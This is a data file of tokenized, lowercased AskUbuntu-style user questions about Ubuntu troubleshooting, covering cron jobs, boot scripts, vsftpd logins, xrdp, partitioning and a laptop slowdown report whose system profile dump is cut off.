445402	ubuntu security : `` antivirus '' in official statement ?	i use current ( and vanilla ) ubuntu in a work environment . ( it is , in the main , a windows-orientated outfit . ) a question has come up about antivirus , and i see this on the official ubuntu website : the default settings prioritise security , and ubuntu comes with a firewall , antivirus software and file and disk encryption tools . however , poking around dash , etc. , i ca n't find any sign of `` antivirus software '' on my machine . what does this statement refer to ? fwiw , i have read ( i think ) most of the `` antivirus '' q & a 's on askubuntu , but have n't found this one dealt with . ( if i 've missed it , please point me in the right direction . thanks ! )
445403	why crontab does n't want to execute the job as root ?	i'am using the ubuntu 14.04 ( trusty ) version and i get a problem with my crontab ( it was working before 13.10 ) here is the command line /usr/lib/cgi-bin/awstats.pl -config=www.skrik.fr -update > /dev/null if i run it as root in my terminal i get no error everything is working smoothly but if i add it with sudo crontab -e i get 0 * * * * root /usr/lib/cgi-bin/awstats.pl -config=www.skrik.fr -update > /dev/null error while processing /etc/awstats/awstats.cloud.skrik.fr.conf create/update database for config `` /etc/awstats/awstats.cloud.skrik.fr.conf '' by awstats version 7.2 ( build 1.992 ) from data in log file `` /var/log/apache2/cloud/access.log '' ... error : could n't open server log file `` /var/log/apache2/cloud/access.log '' : permission denied i get the exact same problem when i add it to /etc/crontab why cron job does n't want to work as root ? thanks a lot for your help
445405	su to different user no longer working in 12.04 lts	i want to log on as tomcat7 user in a different bash command shell . i used to be able to do this by doing the following : sudo su - tomcat7 but when i enter this command now i get returned to the shell for the current user . can someone tell me what the problem might be ?
445408	how can i import photos from a canon digital camera ?	i installed ubuntu 12.04 on my friend 's uncle 's laptop.his uncle uses canon digital camera.is there a possible way to imort photos using ubuntu
445409	startup script ubuntu 12.04	each time i startup the sistem i need to run this command sudo xhost + and the sudo service myservice restart i have decided to add a script to startup to avoid having to type it each time myself . i followed the instructions from here how to run a script during boot as root i created myscript.sh in /etc/init.d and then ran chmod 755 on it then i created a simlink in /etc/rc2.d/s99myscript.sh here is the content of my script : # ! /bin/bash sudo xhost + sudo service siemcy restart ls -l /etc/init.d/my_custom_startup_script.sh -rwxr-xr-x 1 root root 54 apr 9 10:10 /etc/init.d/my_custom_startup_script.sh but when i reboot seems the sript is not run , service siemcy is not running because it needs xhost + so basiclly the screept is not run . or the script is not run at the right time . any advice ? did i put the script in the wrong place ? thanks
445410	mysql error : incorrect key file for table '/tmp/ # sql_5115_0.myi	query failed by reason : incorrect key file for table '/tmp/ # sql_5115_0.myi i read that it may be realted to disk space issue but i ma not sure how that is as df -h returns filesystem size used avail use % mounted on /dev/sda5 69g 5.7g 60g 9 % / udev 7.9g 4.0k 7.9g 1 % /dev tmpfs 3.2g 256k 3.2g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 7.9g 0 7.9g 0 % /run/shm overflow 1.0m 8.0k 1016k 1 % /tmp /dev/sda1 223m 24m 187m 12 % /boot /dev/sdb1 16t 2.9t 13t 19 % /storage keep in mind /storage is not involved in any way with any mysql dbs sugestions ?
445413	image displaced on the screen	i have a intel motherboard video grafics and a benq mk 2442 , and ubuntu 12 4 and my problem is that the image appear displaced at least one inch at right , i have test resapplet but it does n't work ... any idea
445417	sellinux security domains	i am studying selinux , but i ca n't find any clear definition for security domains . what is a security domain and what is its difference with security context ?
445420	dhclient eth0 is not getting ip where as /etc/init.d/networking restart get me the ip	dhclient eth0 is not responding anything . i can not see dhcp packets in wireshark and the ip of the interface remains the same even if i change my dhcp range . but running /etc/init.d/networking restart gets me ip for the interface
445427	startup after installation problem in choosing w7 and ubuntu	i installed ubuntu 12.04 with using dvd beside my windows 7 . installation was completed . then it asked for restarting the system . after that system goes to windows 7 without asking me to choose between windows 7 and ubuntu..
445432	mobile broadband for nokia not working	i have nokia sv40 cellphone which i want to use as a dial up modem to connect to internet . i connected to my system , ubuntu detected it and opened up a wizard to complete the installation and setup of the connection . i completed it successfully . now the problem is that i can not connect to internet using my nokia . i checked settings from control center and found out that mobile broadband is disabled , i tried to enable it but it does n't . flight mode is off . what should i do to fix this .
445433	.profile recovery	i desperately need help . i added a line at the end of my .profile and now i ca n't login . i have tried to solve it through a live cd , following these instructions . however , i get this message opening the .profile : ** ( gedit:9211 ) : warning ** : could not load gedit repository : typelib file for namespace 'gtksource ' , version '3.0 ' not found ** ( gedit:9211 ) : ibus-warning ** : the owner of /home/ubuntu/.config/ibus/bus is not root ! ** ( gedit:9211 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files an empty .profile text launches , but it cant be saved anyway . i tried to launch recovery mode , but it does n't work with the shift key ; i have tried many times with both shif tkey and space , but it does n't work . i also tried to recover my files through a live cd and with a guest session , but nothing worked . my password seems to be completely useless . please help .
445437	doubt about sigint and sig_ign	i am undergoing a course on operating system and in that as the os used is linux we were taught with a program using sigint and sig_ign . when i tried to program the code taught in my pc compiler indicates an error message and both of them ca n't be found . how to install a package to install these macros ? or is there anything different i should do to make them work ? i use ubuntu 12.10
445442	where can i get springseed ?	the website http : //getspringseed.com/ as links to .deb files to install it , but clicking them only gets me a 404 error . where can i get a copy of it ? is there a repo for it ? has it been posted anywhere else on the web ? also : what should i tag this question with ? or does it not belong on this site ?
445444	how to run warcraft iii on ubuntu 13.04 i386 ?	i am trying to run warcraft iii ( doat 1 ) on ubuntu 13.04 , but every time i try to run it with 'wine ' the computer 's resolution changes and the computer carries on as normal . i have done a 'top ' command to see if there are any run-away or rouge processes , but none to close or terminate . i have warcraft iii in a folder already installed to flash , ready to plug and play . if there is another way to do this i would like some pointers .
445445	how is information passed between ipconfig and the init process at boot time	i 'm trying to assign an ipv6 address to my machine at early boot time ( in order to boot a diskless system over ipv6 ) with ip -6 addr add $ ipv6/108 dev eth0 at nfs-premount . this works fine , but as soon as the init process is started , the address i assigned to eth0 is dropped . how does the init process deal with already configured interfaces ? how is the information , gathered by ipconfig at early boot time , passed on to the init process for instance ? does this happen through /run/net-eth0.conf ? and if yes can it handle ipv6 ? best
445449	how to find the path of an mounted iso file ?	i want the full path of the original iso file which was mounted inside /media/iso directory.i do n't know how to get that iso file path . i tried lsblk , sudo blkid commands but nothing seems to work . how do i find the path of an iso file which is currently mounted ? is there any command for that ?
445451	how can i manually copy over files like lxde and other apps ?	i have a really old laptop which i have recently installed lucid 10.04.4 server on because it would not support newer versions . instead of an ethernet cable it has an internal modem with a phone line connection on the outside . it was designed for windows 98 ! i can not work out how to fix my wifi adaptor in terminal . i really want to have a desktop enviroment or at least a window manager with which to manually launch my apps on . how can i carry over files from my internet connected ubuntu 13.10 laptop to this old one and get them working ? thanks for ur help !
445453	wubi-installed ubuntu wo n't allow me to execute executable files	i 'm trying to run executable files on ubuntu , but it 's not working , although the exact same executable file works fine on others ' machines , which are also running ubuntu 12.04 like me . based on this , i asked a question here : executing compiled file on ubuntu but now i realize the issue is n't in my compiled file . because i wrote a very simple .cpp file and tested it , but ubuntu still did n't run it . this is my simple test.cpp : # include < stdio.h > # include < stdlib.h > int main ( int argc , char **argv ) { printf ( `` hello , this test worked ! `` ) ; return 0 ; } then i compiled it : g++ `pkg-config -- cflags opencv` -o test test.cpp and then tried to run it : ./test but i get an error : bash : ./test : permission denied so i try with sudo : sudo ./test which asks me for my user password , which i give , but then it says : sudo : ./test : command not found when i run : pkg-config -- cflags opencv i get this : -i/usr/local/include/opencv -i/usr/local/include when i run df . it says : filesystem 1k-blocks used available use % mounted on /dev/loop0 17596475 6112377 11484098 35 % / running ls -l gives me : -rw -- -- -- - 1 asaaki asaaki 8380 apr 8 18:16 test and running umask gives me 0002 i 've tried sudo chmod +x test and then tried ./test but i still get permission denied . how can i run executable files at all ? do i need to uninstall ubuntu and install it with different configuration options or something ? is n't there are a way to circumvent this problem ?
445456	i ca n't get the wine emulator to install irfanview & microsoft office 2007 pro	i ca n't get the wine emulator to install irfanview & microsoft office 2007 pro . while trying to install irfanview , i get following error message : sha1sum mismatch ! rename /home/rajeev/.cache/winetricks/irfanview/iview428_setup.exe and try again . while trying to install microsoft office 2007 pro , i get these error messages : working around wine bug 14980-using native riched20 and please insert volume 'office12 ' ( needed for package 'office2007pro ' ) please tell me what to do . thanks ...
445458	updates wo n't install	i recently installed ubuntu 12.04 , but now updates will not install . this is the error message : the following packages have unmet dependencies : linux-image-generic-lts-saucy : depends : linux-image-3.11.0-19-generic but it is not installed i have tried several of the terminal commands listed among the askubuntu answers , but get : e : could not open lock file /var/lib/dpkg/lock - open ( 13 - permission denied ) e : unable to lock the administration directory the apt-get -f install does n't fix the problem . i am not a code monkey , so would someone please help me ? thank you .
445459	lubuntu power manager closed after every boot	the power manager on lubuntu 13.10 does not run automatically . after every time i boot my lubuntu , i have to manually open the power manager . how to fix this .
445461	ureadahead main process terminated with status 5	having struggled for the last few days with a kernel panic , this is the new error i am getting on boot . a restart does n't help . i have access to the server in rescue mode where i can mount the filesysytem . here is the contents of /etc/fstab # < file system > < mount point > < type > < options > < dump > < pass > /dev/sda1 / ext4 errors=remount-ro , relatime 0 1 /dev/sda2 /home ext4 defaults , relatime 1 2 /dev/sda3 swap swap defaults 0 0 proc /proc proc defaults 0 0 sysfs /sys sysfs defaults 0 0 devtmpfs /dev devtmpfs rw 0 0 tmpfs /dev/shm tmpfs defaults , noexec , nosuid 0 0
445469	what does -x mean in if conditional statement ?	what does -x mean here : if [ -x /etc/rc.local ] then how could i find out this manual page for if ?
445470	how can i change the appearance of an icon ?	just installed ubuntu 13.10 i am new to ubuntu os . i did number 31 , google services launcher , of this page : what custom launchers and unity quicklists are available ? i 'm just trying to do some things to learn . i am wondering , how can i change the appearance of an icon ? thanks .
445476	touchpad does n't work	i just installed ubuntu 12.04 but ever since i started the installation my touchpad stopped working . i have tried several things , including enabling the touchpad but it does not move at all . the usb mouse however works . would be nice if i could get a detailed answer as i am very new to ubuntu : )
445481	is it possible to remove mouse pointer bounds ( i.e . wrap the screen ) ?	i wonder it is possible to remove mouse pointer bounds . i mean when i move mouse pointer to right side of screen , i want it appear on left side . also same thing for top/bottom bounds . to be clarify , you may think it like snake game without screen walls .
445482	how can i move space from my root partition so i can use it ?	when i installed ubuntu i 've made my boot/root partition way too large . i need some of that space . what can i do now ? i attached a link to a picture to see how my partitions are . i do n't really know what details i should give , i 'm quite new to linux ...
445484	messing around with easy bcd , messed up mbr	so , last night i was messing around with easybcd 2.2 trying to repair my legacy win8 mbr when i messed it up even worse . before , when i started it it would go straight to grub2 and would boot into ubuntu , but not windows 8 ( the boot configuration files are missing or contain errors ) . now , when trying to boot legacy , instead of grub menu , i get `` no bootable device -- insert boot disk and press any key '' . i could not originally boot into windows 8 , but i fixed that with bootrec /fixmbr , bootrec /rebuild bcd and /fixboot . any way to fix ?
445485	ubuntu 14 server and xrdp	i am trying to get xrdp working with the latest ubuntu 14 server . however , after my rdp client logs in all i get is a grey screen with an x in the middle . this is the error from my .xsession-errors file : xsession : x session started for at wed apr 9 10:16:16 edt 2014 x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 109 ( x_changehosts ) value in failed request : 0x5 serial number of failed request : 6 current serial number in output stream : 8 localuser : hoffmanjon being added to access control list x error of failed request : badvalue ( integer parameter out of range for operation ) major opcode of failed request : 109 ( x_changehosts ) value in failed request : 0x5 serial number of failed request : 6 current serial number in output stream : 8 openconnection : connect : no such file or directory can not connect to brltty at :0 script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . 2009 ? 00:00:00 vboxclient 2018 ? 00:00:00 vboxclient 2028 ? 00:00:00 vboxclient 2023 ? 00:00:00 vboxclient script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . gnome-session-is-accelerated : no composite extension . gnome-session-check-accelerated : helper exited with code 256 gnome-session-is-accelerated : no composite extension . gnome-session-check-accelerated : helper exited with code 256 ** ( process:2675 ) : warning ** : software acceleration check failed : child process exited with code 1 ** ( x-session-manager:2675 ) : critical ** : we failed , but the fail whale is dead . sorry ... . the gui environments i have tried after the base install of the server and how i installed them : sudo apt-get install ubuntu-desktop : gets the grey screen when i use my rdp client sudo apt-get install xubuntu-deskop : gets the grey screen when i use my rdp client sudo apt-get install xubuntu-desktop xfce4 : gets the grey screen when i use my rdp client sudo apt-get install xorg xfce4 : the rdp client works but does n't provide all of the tools that the ubuntu and xubuntu desktop provide . i also tired going though this post with no success . does anyone have any suggestions that my help in getting xrdp to work with one of the standard ubuntu desktops ?
445486	how do i launch my script from a launcher ?	i have my custom script in ruby with read permission , which starts with : # ! /usr/bin/env ruby i can run that script from the terminal by typing that path . i added a file with .desktop extention to /usr/share/applications with content [ desktop entry ] name=foo comment=foo exec=/path/to/the/script terminal=false type=application categories=utility ; application ; and permission 777 . when i open the ubuntu file/application searcher at the top-left corner , i find my script by typing in the name . but when i click on it , it does not run . what am i doing wrong ?
445487	which ubuntu version is equivalent to debian squeeze ?	i have some software packages customised for ubuntu 10.04 , 10.10 and 12.10 , but now i have to install them on debian squeeze . i have been unable to google for a mapping between specific ubuntu and debian versions . can someone here help ? specifically i want to know which ubuntu version corresponds to debian squeeze .
445488	when i go to ccsm ( compizconfig settings manager ) the `` animations '' page is blank	any idea how to fix it ? i would like to edit the minimize effects . i 'm also open to alternatives to the program . ubuntu version : 13.10
445491	vi/vim/view /etc/alternatives loop	i wanted to understand the difference between the executables vi and vim . which has led me to /usr/bin/ , and there i 've found the following symlinks : /usr/bin/vi - > /etc/alternatives/vi /usr/bin/vim - > /etc/alternatives/vim going to /etc/alternatives/ , i saw that these names link back to /usr/bin/ : /etc/alternatives/vi - > /usr/bin/vim.gnome /etc/alternatives/vim - > /usr/bin/vim.gnome after wondering a bit why is it so , i came to the conclusion that both are pointing to the same executable , hence they are completely the same . however , something cought my eye that moment ; this link : /etc/alternatives/view - > /usr/bin/vim.gnome accompanied with this link : /usr/bin/view - > /etc/alternatives/view now , that 's weird , since i know that when i run view it 's not the same as when i run vim ; it opens a read-only mode of the file given as an argument . does vim.gnome binary knows what was linking to it when executed , somehow ? ( by the way , same issue is with vimdiff ) do you have an explanation for that ?
445492	subdirectories show 404 not found on 13.10 web server	i recently set up a web server on ubuntu 13.10 and when i enter the external ip it works fine showing the index file of var/www/ but whenever i try to add a folder , say one called test , and i go to ext.ernal.ip.add/test it shows the 404 not found error . even when i try to access it using localhost/test i still get a 404 not found message and even when i try localhost/test/index.php i still get the same error . in setting it up i installed apache2 , php5 , mysql , and phpmyadmin ( all with no errors ) . other than that i have not done anything else except add the following to apache2.conf : serversignature off servertokens prod i 'm new to setting up web servers and all this so if there is any other information needed for this question i will gladly edit the post asap , just let me know what is needed . again i 'm wondering why i ca n't access folders within var/www/ over localhost or using the external ip when the folder has been created and an index file has been created inside of the folder .
445494	installing ubuntu 13.10 on new macbook pro . installs then fails after restart	so i install ubuntu from a live usb . no problems there . i get to the end of the the installation and am told to restart . i restart it them get a white screen with a blinking file icon with a question mark in it . ubuntu is installed as if i try to install again it says ubuntu is running when you are asked weather you want to erase the previous operating system . any help ?
445500	my laptop has both a 500 gb hdd and a 32 gb ssd , what 's the best way to partition my ubuntu installation , and how ?	would the best method be to install the os on the ssd and then keep all my files on the hdd ? what do you think is the best way to partition my installation , and how would i do so ? thanks !
445507	fn keys not working	i wanted to give lubuntu a try . everything works , even audio now , except the volume control with fn keys , and it would be nice to have those back . lol running on a toshiba satellite c75d-a if that 's of any importance .
445510	getting cyrillic around ubuntu - unwanted	i 'm new to ubuntu and i choose kosovo as my country during the set up . that 's my country indeed , but my language does not include cyrillic symbols at all . i guess this is a misunderstanding that linux decided to show these characters for this specific country . anyway , this is disturbing me and i do n't want to see those characters on my system . i 'm not saying that i 'm getting them everywhere , but i 'm getting those in quite some places , such as when clicking the clock and then i 'm presented with a calendar . here 's how it looks like : ( sorry that it 's a bit blurred , but i could n't do better . still not used to ubuntu ) then skype ... it also displays the date and time in cyrillic . how do i fix this issue and make my system show only english roman letters ?
445511	how would i transfer music files from a usb flash drive into rythm box ?	i have tried dragging and dropping and importing through rhythm box . i always get the error message '' there is not enough space on the destination . try to remove files to make space . '' ive tried moving it to an empty folder and the same error appears , saying i need another 2.2 gb more . i think im out of room in the partition im using but i thought i had 50 gb in said partition . heres the list : arron @ arron-desktop : ~ $ sudo parted -l model : ata wdc wd10ezrx-00l ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 512mb 511mb linux-swap ( v1 ) 2 512mb 20.5gb 20.0gb ext4 3 20.5gb 20.6gb 99.6mb fat32 boot now how do i know which one im using , and if its not right how would i go in and change it ? thanks
445512	watching video on youtube laptop freeze with weird sound	sometimes it just happens , and i dont know why , during the screen freezed my keyboard and mouse unable to work well , so i had to force shutdown to restart . i use google chrome as my main browser because firefox extremely laggy for me . my computer spec is , intel celeron dual core processor with 1.60mhz speed . 4gb of ram . intel hd graphic card ( intergrated graphic card ) 13:10 running ubuntu 64bit ( fully updated ) thanks in advance .
445513	does ubuntu provide patched version of openssl for 12.10 ?	12.10 is right at end of life in april 2014 .
445518	disk failure imminent	i have been using win7 ubuntu 12.04 dual boot laptop and one day i got disk failure imminent message in ubuntu.i have been using win 7 since then for about 2 months now and havent experienced anything problematic but it is not letting me boot in ubuntu.what should i do ?
445520	password-less ubuntu install ?	when you run ubuntu as a live boot you are able to install programs etc . without a password , but when you have installed it you have to choose a password and you have to put it in everytime you want to do something system critical . can you make an install without any kind of password ? i am very aware that it is a lot more safe to have the password , iâ´m just curious : )
445523	vsftpd ubuntu 13.10 login incorrect	i ca n't login to my vsftpd server - i am getting error 530 login incorrect . how to fix it ? /etc/vsftpd.conf listen=yes anonymous_enable=no local_enable=yes write_enable=yes dirmessage_enable=yes use_localtime=yes xferlog_enable=yes connect_from_port_20=yes chroot_local_user=no secure_chroot_dir=/var/run/vsftpd/empty # i tried both ... # pam_service_name=ftp pam_service_name=vsftpd rsa_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem rsa_private_key_file=/etc/ssl/private/ssl-cert-snakeoil.key seccomp_sandbox=no /etc/pam.d/vsftpd # standard behaviour for ftpd ( 8 ) . auth required pam_listfile.so item=user sense=deny file=/etc/ftpusers onerr=succeed # note : vsftpd handles anonymous logins on its own . do not enable pam_ftp.so . # standard pam includes @ include common-account @ include common-session @ include common-auth auth required pam_shells.so /etc/ftpusers # /etc/ftpusers : list of users disallowed ftp access . see ftpusers ( 5 ) . # commented 'root ' for tests . ca n't login either # root daemon bin sys sync games man lp mail news uucp nobody /etc/shells # /etc/shells : valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash /var/log/vsftpd.log ... wed apr 9 16:49:07 2014 [ pid 9838 ] connect : client `` 127.0.0.1 '' wed apr 9 16:49:09 2014 [ pid 9837 ] [ my-username ] fail login : client `` 127.0.0.1 '' $ groups my-username adm cdrom sudo dip plugdev fuse lpadmin sambashare ftp $ id my-username uid=1000 ( my-username ) gid=1000 ( my-username ) groups=4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,104 ( fuse ) ,108 ( lpadmin ) ,124 ( sambashare ) ,129 ( ftp ) ,1000 ( my-username ) i tried to change pam_service_name , added seccomp_sandbox=no , i reinstalled vsftpd , i tried dpkg-reconfingure ( i restarted vsftpd service after every config change ) . still no success ... obviously user my-username exists , and it 's in ftp group as above . how to make vsftpd works ? i have n't use vsftpd for some time and it stopped working after some update . i am using xubuntu 13.10 edit : just tried same settings on different computer ( fresh xubuntu install ) and it works ok. what am i missing ? currently i am just using pure-ftp ...
445526	how do i use the `` web browser app '' ?	there is an extra browser in ubuntu 14.04 other than firefox , `` the browser app '' which looks like a mobile browser . it also has an earth shaped icon.it is not like a traditional browser . i know we can open new tab in it by going to activity icon , but i dont know how to close a tab , i want to know if it is possible to do private browsing in that browser , i cant select text , i cant do direct download of anything . some help would be greatly appreciated .
445527	i installed ubuntu 12.04.4 lts along side windows xp	i installed ubuntu 12.04.4 lts along side windows xp , dell inspiron 531 . i then rebooted my computer . the message `` can not display this video mode optimum resolution 1440 x 900 60hz '' appears . i hit enter then i get the password screen but i am unable to operate the mouse to be able to move the arrow into the box to type my password . then after a few seconds the screen shows a mauve color then freezes . my monitor is a dell se178wfp flat panel monitor . i would appreciate any help you could provide .
445528	downloading and burning a live cd	can i download and burn a live cd on my laptop then use that cd to install an os on my mothers desktop ? thank you .
445529	how can i have an application automatically display on all desktops under openbox ?	is it possible to use wmctrl or something else to make a specific window automatically display on all desktops ? i use the prime player google play music miniplayer chrome extension to control music playback . i already have a bash alias i can invoke to make the miniplayer stay on top of other windows , but i want to also have it send the miniplayer window to all desktops so i do n't have to right-click and select send to desktop â all desktops ( via openbox ) . ideally , i would have a script run something in the background and as soon as it detects the miniplayer window it puts it on top and sends to all desktops . is this possible ?
445533	crash in systemd-shim	today we installed ubuntu 13.10 . now a system error occurred : systemerror executable path /usr/lib/i386-linux-gnu/systemd-shim package systemd-shim 3+real-oubuntu1 problem type crash title systemd-shim crashed with sigsegv in do_lookup_x ( ) apport version 2.12.5-oubuntu2 arichtecture i386 segvreason reading unknown vma signal 11 unreportablereason you have some obsolete packages installed.please upgrade system-shim , gcc-4.8-base , libgcc1 , libglib2.0-0 , libglib2.0-data upgrade status no upgrade log present ( probably fresh install ) please help ! we are a total beginner ! thank you !
445534	ubuntu 13.10 wo n't install it just reboot the pc when terying to install	im having a problem in installing any version of ubuntu along side window 's seven or inside it , it seems that the only sollution is to format my pc but i do n't like to do that . when booting from the usb stuck the option install along side windows seven wont figure in the list .so i just choose to installe ubuntu inside but it just shutdown and restart to windows . is it there any solution .
445535	what will be the difference between freshly installed os and upgraded from previous version ?	i had installed ubuntu 13.10 when it was released . now ubuntu 14.04 lts is ready to be launched . i wonder if there will be any different between a freshly installed ubuntu and upgraded from previous version . i know there are some user files and which will be preserved and a couple of software which i installed . but other than that what will not be upgraded . yeah , it 's a dumb question ! ! ps : i already upgraded to ubuntu 14.04 rc . edited/added actually , i asked this because even after upgraded to `` release candidate '' and the default new wallpapers are still missing . is there anything else ?
445536	unable to locate package add-apt-repository error	i 'm trying to install apt-add-repository on ubuntu 14.04. sudo apt-get install add-apt-repository reading package lists ... done building dependency tree reading state information ... done e : unable to locate package add-apt-repository i have also tried installing python-software-properties sudo apt-get install python-software-properties however , it still is missing ... does anyone know where this package has gone ?
445538	what version should i download ?	migrating from xp . dell 2400 , pentium 4 , 2.66 ghz , 1.25 ram use my desktop for open office , firefox , outlook ( will switch to thunderbird ) , microsoft money . what would be the smartest and easiest version to switch to ?
445547	lubuntu : laptop abnormally slow	my laptop is pretty new ( less than a year ) and has decent specs , but since 1/2 months it gets really slow even if i do things i could easily do before ( development + browsing ) . this makes it unusable and it is especially disappointing because : my laptop could handle these tasks earlier and i installed lubuntu because i wanted to focus on performance and do n't care about ui and my questions are : how can i make sure i do n't have a background program eating all my resources ? i especially suspect my processor to under-use its capacities . how can i know about that too ? is there a chance it is a bug in my current distribution ( lubuntu 13.10 ) that could be solved with 14.04 ? ( i kind of suspect the bad performances to have arisen when upgrading to 13.04 ) . if it is a hardware defect , i can i know about it ? here is the report generated by system profiler and benchmark : computer summary computer processor 4x intel ( r ) core ( tm ) i5-2557m cpu @ 1.70ghz memory 3947mb ( 3224mb used ) operating system ubuntu 13.10 user name augustin ( augustin ) date/time mer . 09 avril 2014 18:25:02 cest display resolution 1600x900 pixels opengl renderer unknown x11 vendor the x.org foundation multimedia audio adapter hda-intel - hda intel pch input devices lid switch power button sleep button at translated set 2 keyboard usb2.0 vga webcam asus wmi hotkeys etps/2 elantech touchpad video bus hda intel pch hdmi/dp , pcm 3= hda intel pch headphone hda intel pch mic printers ( cups ) hp-officejet-7400-series default photosmart_b010 photosmart_b010_2 scsi disks ata sandisk ssd u100 generic- xd/sd/m.s . operating system version kernel linux 3.11.0-19-generic ( x86_64 ) compiled # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 c library unknown default c compiler gnu c compiler version 4.8.1 ( ubuntu/linaro 4.8.1-10ubuntu9 ) distribution ubuntu 13.10 current session computer name sempiternel user name augustin ( augustin ) home directory /home/augustin desktop environment lxde ( lubuntu ) misc uptime 18 hours , 59 minutes load average 0,00 , 0,00 , 0,00 kernel modules loaded modules pci_stub vboxpci oracle vm virtualbox pci access driver vboxnetadp oracle vm virtualbox network adapter driver vboxnetflt oracle vm virtualbox network filter driver vboxdrv oracle vm virtualbox support driver zram compressed ram block device parport_pc pc-style parallel port driver ppdev rfcomm bluetooth rfcomm ver 1.11 bnep bluetooth bnep ver 1.3 binfmt_misc snd_hda_codec_hdmi hdmi hd-audio codec snd_hda_codec_realtek realtek hd-audio codec joydev joystick device interfaces x86_pkg_temp_thermal x86 pkg temp thermal driver intel_powerclamp package level c-state idle injection for intel cpus coretemp intel core temperature monitor kvm_intel kvm crct10dif_pclmul t10 dif crc calculation accelerated with pclmulqdq . crc32_pclmul ghash_clmulni_intel ghash message digest algorithm , acclerated by pclmulqdq-ni aesni_intel rijndael ( aes ) cipher algorithm , intel aes-ni instructions optimized aes_x86_64 rijndael ( aes ) cipher algorithm , asm optimized lrw lrw block cipher mode gf128mul functions for multiplying elements of gf ( 2^128 ) glue_helper ablk_helper cryptd software async crypto daemon ath3k atheros ar30xx firmware driver btusb generic bluetooth usb driver ver 0.6 bluetooth bluetooth core ver 2.16 asus_nb_wmi asus notebooks wmi hotkey driver asus_wmi asus generic wmi driver sparse_keymap generic support for sparse keymaps uvcvideo usb video class driver videobuf2_vmalloc vmalloc memory handling routines for videobuf2 videobuf2_memops common memory handling routines for videobuf2 videobuf2_core driver helper framework for video for linux 2 videodev device registrar for video4linux drivers v2 arc4 arc4 cipher algorithm ath9k support for atheros 802.11n wireless lan cards . ath9k_common shared library for atheros wireless 802.11n lan cards . ath9k_hw support for atheros 802.11n wireless lan cards . snd_hda_intel intel hda driver snd_hda_codec hda codec core snd_hwdep hardware dependent layer ath shared library for atheros wireless lan cards . snd_pcm midlevel pcm code for alsa . snd_page_alloc memory allocator for alsa system . snd_seq_midi advanced linux sound architecture sequencer midi synth . snd_seq_midi_event midi byte < - > sequencer event coder snd_rawmidi midlevel rawmidi code for alsa . mac80211 ieee 802.11 subsystem rts5139 realtek rts5139/29 usb card reader driver snd_seq advanced linux sound architecture sequencer . cfg80211 wireless configuration support snd_seq_device alsa sequencer device management snd_timer alsa timer interface microcode microcode update driver psmouse ps/2 mouse driver i915 intel graphics serio_raw raw serio driver lpc_ich lpc interface for intel ich drm_kms_helper drm kms helper mac_hid snd advanced linux sound architecture driver for soundcards . mei_me intel ( r ) management engine interface drm drm shared core routines mei intel ( r ) management engine interface soundcore core sound module wmi acpi-wmi mapping driver i2c_algo_bit i2c-bus bit-banging algorithm video acpi video driver option usb driver for gsm modems usb_wwan usb driver for gsm modems usbserial usb serial driver core lp parport ahci ahci sata low-level driver libahci common ahci sata low-level routines boots boots tue apr 8 2:25 33..11.0-19-generi|- tue apr 8 2:24 33..11.0-19-generi|- tue apr 8 2:34 33..11.0-19-generi|- tue apr 8 1:02 33..11.0-19-generi|- tue apr 8 0:28 33..11.0-18-generi|- tue apr 8 0:01 33..11.0-18-generi|- mon apr 7 1:03 33..11.0-18-generi|- sun apr 6 2:15 33..11.0-18-generi|- thu apr 3 2:45 33..11.0-18-generi|- thu apr 3 2:37 33..11.0-18-generi|- thu apr 3 0:20 33..11.0-18-generi|- thu apr 3 0:10 33..11.0-18-generi|- wed apr 2 1:50 33..11.0-18-generi|- tue apr 1 2:51 33..11.0-18-generi|- tue apr 1 1:22 33..11.0-18-generi|- tue apr 1 1:09 33..11.0-18-generi|- tue apr 1 1:08 33..11.0-18-generi|- tue apr 1 1:08 33..11.0-18-generi|- tue apr 1 0:36 33..11.0-18-generi|- tue apr 1 0:49 33..11.0-18-generi|- languages available languages en_ag english language locale for antigua and barbuda en_ag.utf8 english language locale for antigua and barbuda en_au.utf8 english locale for australia en_bw.utf8 english locale for botswana en_ca.utf8 english locale for canada en_dk.utf8 english locale for denmark en_gb.utf8 english locale for britain en_hk.utf8 english locale for hong kong en_ie.utf8 english locale for ireland en_in english language locale for india en_in.utf8 english language locale for india en_ng english locale for nigeria en_ng.utf8 english locale for nigeria en_nz.utf8 english locale for new zealand en_ph.utf8 english language locale for philippines en_sg.utf8 english language locale for singapore en_us.utf8 english locale for the usa en_za.utf8 english locale for south africa en_zm english locale for zambia en_zm.utf8 english locale for zambia en_zw.utf8 english locale for zimbabwe fr_be.utf8 french locale for belgium fr_ca.utf8 french locale for canada fr_ch.utf8 french locale for switzerland fr_fr.utf8 french locale for france fr_lu.utf8 french locale for luxemburg filesystems mounted file systems /dev/sda2 / 86,25 % ( 15,1 gib of 109,9 gib ) none /sys/fs/cgroup 0,00 % ( 4,0 kib of 4,0 kib ) udev /dev 0,00 % ( 1,9 gib of 1,9 gib ) tmpfs /run 0,28 % ( 384,4 mib of 385,5 mib ) none /run/lock 0,00 % ( 5,0 mib of 5,0 mib ) none /run/shm 2,51 % ( 1,8 gib of 1,9 gib ) none /run/user 0,03 % ( 100,0 mib of 100,0 mib ) display display resolution 1600x900 pixels vendor the x.org foundation version 1.14.5 monitors monitor 0 1600x900 pixels extensions big-requests composite damage double-buffer dpms dri2 glx generic event extension mit-screen-saver mit-shm randr record render security sgi-glx shape sync x-resource xc-misc xfixes xfree86-dga xfree86-vidmodeextension xinerama xinputextension xkeyboard xtest xvideo opengl vendor unknown renderer unknown version unknown direct rendering no environment variables environment variables user augustin language fr_fr upstart_instance xdg_seat seat0 textdomain im-config ssh_agent_pid 1457 session lubuntu home /home/augustin desktop_session lubuntu xdg_seat_path /org/freedesktop/displaymanager/seat0 instance dbus_session_bus_address unix : abstract=/tmp/dbus-jfsbk0stsw mandatory_path 